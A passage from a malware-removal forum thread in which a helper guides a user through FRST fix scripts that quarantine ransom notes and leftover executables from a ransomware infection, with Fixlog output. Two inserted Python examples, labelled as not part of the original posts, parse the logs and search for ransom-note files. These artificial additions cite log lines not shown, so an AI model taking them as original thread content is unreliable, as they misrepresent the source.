C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\6F2HFX6I.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\F80C8YK2.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\ILESJKL3.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\K0KQ6VJD.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\N6C9B6FT.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\PICRTI7N.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\TE1HBMFT.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\G8HIT1UX.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\MGN8REVU.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\R1QO5JP1.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\YISNRMU8.htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\D163.tmp => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\~009CE97E.tmp => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\41c\AppData\Local\Microsoft\Windows\INetCache\IE\1C1SW3MG\82123fbcab77830f3af0dcbe5208a3d5[1].htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\c4\AppData\Local\Microsoft\Windows\INetCache\IE\C7ZS5GJ0\a780b2c52f7951abae3fde16fd81989d[1].htm => Moved successfully.
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631tmp.exe => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Public\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Public\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows\Installer\dfb9a6.msi => Moved successfully.
C:\Windows.old\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg => Moved successfully.
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg => Moved successfully.
 
 
The system needed a reboot. 
 
==== End of Fixlog 20:55:35 ====

Attached Files


  • 0
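An added example, not part of the original posts and not FRST's own code: a small Python parser for the `target => status` result lines of a Fixlog like the one above. It lists every entry that was not moved and flags the case where a scanner's detection label was pasted into the fixlist together with the path, as in the FlashPlayerUpdateService.exe line. The label pattern is an assumption based on the label shapes visible in this thread's scan log.

```python
import re

# Excerpt of the Fixlog posted above: two status lines and three result lines.
FIXLOG_EXCERPT = r"""
Restore point was successfully created.
Processes closed successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML => Moved successfully.
"""

# One result line has the form: <target> => <status>
RESULT_RE = re.compile(r"^(?P<target>.+?) => (?P<status>.+)$")

# Assumption: a pasted scanner label looks like the ones in this thread's
# scan log, e.g. "Win32/Filecoder.CR trojan" or
# "a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application".
LABEL_RE = re.compile(
    r"\s+(?:a variant of\s+)?[A-Za-z0-9]+/[\w.]+\s+"
    r"(?:trojan|potentially unsafe application)$"
)

MOVED = "Moved successfully."


def parse_fixlog(text):
    """Return (target, status) for every result line; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = RESULT_RE.match(line.strip())
        if m:
            # The not-found line in this log is wrapped in double quotes.
            entries.append((m.group("target").strip('"'), m.group("status").strip()))
    return entries


def audit(entries):
    """Return one finding per entry that was not moved.

    If the target ends in a scanner label, the finding also carries the
    label and the path with the label stripped, so the path can be re-checked.
    """
    findings = []
    for target, status in entries:
        if status == MOVED:
            continue
        finding = {"target": target, "status": status,
                   "label": None, "clean_path": None}
        m = LABEL_RE.search(target)
        if m:
            finding["label"] = m.group(0).strip()
            finding["clean_path"] = target[:m.start()]
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit(parse_fixlog(FIXLOG_EXCERPT)):
        print(f["status"], "->", f["target"])
        if f["label"]:
            print("  fixlist line carried a detection label:", f["label"])
            print("  path to re-check:", f["clean_path"])
```

FRST looked up the path with the detection text attached, so the "not found" result says nothing about whether the executable itself is still on disk.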

#13
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Once more into the breach, my friends ....

 

Download the attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..".  The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.  

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on.  Press the Fix button just once and wait.  The tool will create a restore point, process the script and ask for a restart of your system.


If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 

Attached Files


  • 0

#14
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

Okay, posted below is the new fixlog!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 25-02-2015 01
Ran by Dorothy01 at 2015-02-27 06:26:14 Run:3
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.TXT
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.HTML
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.TXT
C:\Users\Public\DECRYPT_INSTRUCTION.URL
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.URL
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Recent\DECRYPT_INSTRUCTION.lnk
C:\System Volume Information\HELP_DECRYPT.PNG
C:\System Volume Information\HELP_DECRYPT.URL
C:\System Volume Information\EfaData\HELP_DECRYPT.PNG
C:\System Volume Information\EfaData\HELP_DECRYPT.URL
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.HTML
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.PNG
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.TXT
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.URL
Reboot:
end
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Windows.old\Users\Dorothy01\AppData\Local\Microsoft\Windows Media\12.0\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Public\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Recent\DECRYPT_INSTRUCTION.lnk => Moved successfully.
C:\System Volume Information\HELP_DECRYPT.PNG => Moved successfully.
C:\System Volume Information\HELP_DECRYPT.URL => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.PNG => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.URL => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.HTML => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.PNG => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.TXT => Moved successfully.
C:\$Recycle.Bin\S-1-5-21-1427692388-1042374531-2795145444-1001\HELP_DECRYPT.URL => Moved successfully.
 
 
The system needed a reboot. 
 
==== End of Fixlog 06:27:16 ====

  • 0

#15
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Sorry for the delay; we need to check that there are no more Decrypt files spawning on the system.

 

First, let's remove the ones in Quarantine (FRST's Quarantine) by running the attached script.

 

Download the attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..".  The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.  

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show that it is ready to use (meaning there is no update found) and you can continue on.  Press the Fix button just once and wait.  The tool will create a restore point, process the script and ask for a restart of your system.


If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post the log in your next reply.

 

Second, search with FRST for any files >>>>

 

Start FRST64 by right clicking on it and selecting "Run as Administrator"

 

Once it opens, copy the following text into the Search box.

 

 

HELP_DECRYPT.*;DECRYPT_INSTRUCTION.*

 

 

 

Click the Search Files button and wait.  FRST will display a progress bar and messages and when finished, produce a Search.txt log file.  Please attach that file to a reply post here (it will most likely be too large to paste the text in a reply).

 

Attached Files


  • 0
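The re-check described in the post above, as an added example (not from the thread and not how FRST works internally): a Python walk that applies the same two name patterns and separates notes that predate the last fix from notes written after it. The skipped quarantine folder is a parameter because the thread does not give its path, and file modification time is an assumed hint for "written after the fix".

```python
import fnmatch
import os
import sys
from datetime import datetime

# The search string from the post above; patterns are separated by ';'.
SEARCH_STRING = "HELP_DECRYPT.*;DECRYPT_INSTRUCTION.*"


def split_patterns(search_string):
    """Split the ';'-separated search string into lower-cased glob patterns."""
    return [p.strip().lower() for p in search_string.split(";") if p.strip()]


def find_notes(root, search_string=SEARCH_STRING, skip_dirs=()):
    """Return (path, mtime) for every file under root matching a pattern.

    Matching is case-insensitive. Directories listed in skip_dirs (for
    example a quarantine folder) are not descended into.
    """
    patterns = split_patterns(search_string)
    skip = {os.path.normcase(os.path.abspath(d)) for d in skip_dirs}
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune skipped directories in place so os.walk does not enter them.
        dirnames[:] = [
            d for d in dirnames
            if os.path.normcase(os.path.abspath(os.path.join(dirpath, d))) not in skip
        ]
        for name in filenames:
            if any(fnmatch.fnmatchcase(name.lower(), p) for p in patterns):
                full = os.path.join(dirpath, name)
                try:
                    hits.append((full, os.stat(full).st_mtime))
                except OSError:
                    continue  # unreadable or removed while scanning
    return hits


def split_by_fix_time(hits, fix_time):
    """Split hits into (leftover, respawned) relative to the last fix run.

    leftover:  notes last modified at or before the fix (missed by the fixlist)
    respawned: notes modified after the fix (something may still be writing them)
    """
    cutoff = fix_time.timestamp()
    leftover = sorted(p for p, m in hits if m <= cutoff)
    respawned = sorted(p for p, m in hits if m > cutoff)
    return leftover, respawned


if __name__ == "__main__":
    # Usage: script.py <root> "<YYYY-MM-DD HH:MM:SS>" [dir-to-skip ...]
    root, when = sys.argv[1], sys.argv[2]
    fix_time = datetime.strptime(when, "%Y-%m-%d %H:%M:%S")
    leftover, respawned = split_by_fix_time(
        find_notes(root, skip_dirs=sys.argv[3:]), fix_time)
    print(f"{len(leftover)} note(s) older than the fix, "
          f"{len(respawned)} written after it")
    for path in respawned:
        print("  NEW:", path)
```

The fix time to pass in is the "Ran by ... at" timestamp in the Fixlog header; an empty "written after it" list across a reboot or two is the result the helper is looking for.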





